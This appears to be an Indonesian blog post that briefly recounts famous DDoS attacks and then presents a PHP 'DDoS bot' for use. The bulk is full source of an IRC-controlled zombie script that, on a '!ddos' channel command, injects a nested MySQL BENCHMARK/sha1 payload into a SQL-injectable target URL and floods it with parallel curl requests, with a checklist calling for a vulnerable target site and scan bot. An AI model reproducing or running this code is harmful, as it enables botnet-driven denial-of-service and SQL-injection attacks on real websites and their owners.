Sampai dengan sekarang ini pengertian tentang DDOS adalah seperti yang anda dengarkan beberapa waktu yang lalu mengenai serangan terhadap web site Yahoo! MSN, CNN, Buy.com, eBay dan Amazon.com. Informasi terkini yang didapat kan adalah bahwa serangan hacker itu berasal dari West Coast, United States (Oregon dan California). Dari laporan FBI menuliskan bahwa serangan ini melibatkan beberapa network dari universitas yang ada di daerah tersebut yaitu Stanford, state California dan Santa. Barbara. Pada whitepaper ini akan dibahas sekilas mengenai cara serangan para hacker tersebut ke beberapa web site yang disebutkan di atas
Serangan Denial of Service(DOS) ini terjadi apabila penyerang atau yang sering terdengar dengan istilah hacker ini merusak host atau sevice yang ada sehingga host atau service itu tidak dapat lagi berkomunikasi secara lancar di dalam network neighborhood nya.Serangan seperti ini juga dapat menghancurkan seluruh host dengan mengakibatkan “kernel panic” pada Linux dan keluarga UNIX lainnya atau lebih umumnya the “blue screen on death” nya Windows NT dan 98.
Serangan DOS ini dapat ditujukan dengan lebih spesifik terhadap services yang ada, contohnya seperti host Web Server dan fungsi dari Network Interface Card (NIC).
Bahkan yang lebih menyenangkan lagi si penyerang menargetkan serangan khusus pada network environment seperti network bandwith dengan menciptakan network request imitasi sehingga terjadi network bussy atau istilah yang lebih familiarnya bottleneck (yang pasti bandwith networknya menjadi full of waste ). Seperti anda ketahui bahwa bandwith adalah bagian yang sangat esensial dari koneksi internet (saluran ke internet). Dengan memenuhi saluran tersebut dengan infomasi sampah(network request imitasi) si penyerang dapat dengan bebas menguasai network bandwith yang masih available. Serangan DOS terakhir yang terjadi adalah pada tgl 7 January 2000.
Serangan DOS ini telah ada pada tahun 1988 yaitu Robert Moris Internet Worm, Melissa virus yang terkenal pada tahun dan masih banyak lagi kejadian DOS pada network dan perusahaan yang tidak diketahui.
Meskipun hal-hal ini disebabkan oleh worm, virusdan beberapa macam dari program yang ada, semua ini terjadi dengan cara yang sama yaitu : satu host menyampaikan informasi atau berkomunikasi dengan host lainnya dan kemudian secara efektif menghancurkan korban dengan mengirim segudang informasi yang tidak dapat di tanggani oleh korban itu sendiri.okeh ga banyak cincong lagi
Yang perlu disiapin
1.Web target vuln sql
2.Irc Scanb0t
3.php localhost (use apache or xampp)
4.zommbie php that's it :
/*################################################################
___ __ __ _____ [] __ __ PHP DDOS BOT #######
/ / / / / / / _ / __ / / version: 1.0 ######
/ /__ / /_/ / / /_/ / / / / / author: fr0z3n ######
/______/ /_____/ /_____/ /_/ /_/ _ PHP version req: 5.2.8.8 ######
email: fr0z3n@gmx.de ####
extensions: php_curl.dll ####
############################################################################
#######################
## IRC CONFIGURATION ##
#######################
$irc_server = "yourserver";
$irc_port = "6667";
$channel = "#ddos";
$channel_pass = "ddos";
$nick = "LudiX-".time();
$reg_con = "$nick "localhost" "$irc_server" :fr0z3n";
##########################
## END OF CONFIGURATION ##
##########################
$irc_socket = fsockopen($irc_server, $irc_port);
$dd0s = 0;
$dozzed = 1;
if(!$irc_socket)
{
print "[-] Could not connect to $irc_servern[!] Check your config!";
exit;
}
print "[x] Connected to $irc_servern";
fputs($irc_socket, "USER $reg_conrn");
fputs($irc_socket, "nick $nickrn");
while(!feof($irc_socket))
{
$buffer = fgets($irc_socket);
#print $buffer;
if(preg_match("[^PING (.*)]", $buffer, $analyse))
{
fputs($irc_socket, "PONG $analyse[1]");
}
if(preg_match("[376 $nick :End of /MOTD]", $buffer))
{
print "[x] End of /MOTD command.n[x] Joining $channelrn";
fputs($irc_socket, "join $channel $channel_passn");
}
if(preg_match("[.*PRIVMSG .* :!ddos[RUN] (.*) -i (.*) -t (.*)]", $buffer, $dat))
{
$host = $dat[1];
$x = $dat[2];
$threads = trim($dat[3]);
$host = str_replace("ddos", "BENCHMARK(100000000000,BENCHMARK(999999999999999999999,sha1(1)))", $host);
preg_match("[(http://.*.php).*]", $host, $print);
fputs($irc_socket, "PRIVMSG $channel :STARTING DDOS for $x times with $threads threads [".$print[1]."]rn");
print $host;
$dd0s = 1;
}
if($dozzed == $x)
{
$dd0s = 0;
$dozzed = 1;
$x = 0;
$threads = 1;
fputs($irc_socket, "PRIVMSG $channel :FINISHED DDOSrn");
}
if($dd0s == 1)
{
ddos($host, $threads, $irc_socket, $channel);
++$dozzed;
}
}
function ddos($host, $x, $irc_socket, $channel)
{
$i = 0;
$mh = curl_multi_init();
while($i < $x)
{
$ch[$i] = curl_init();
curl_setopt($ch[$i], CURLOPT_URL, "$host");
curl_setopt($ch[$i], CURLOPT_HEADER, 0);
curl_setopt($ch[$i], CURLOPT_TIMEOUT, 20);
curl_setopt($ch[$i], CURLOPT_MUTE, TRUE);
curl_multi_add_handle($mh,$ch[$i]);
++$i;
}
$running=null;
do {
$eater = curl_multi_exec($mh,$running);
} while($running > 0);
$i = 0;
while($i < $x)
{
curl_multi_remove_handle($mh,$ch[$i]);
++$i;
}
curl_multi_close($mh);
}
?>
Tidak ada komentar:
Posting Komentar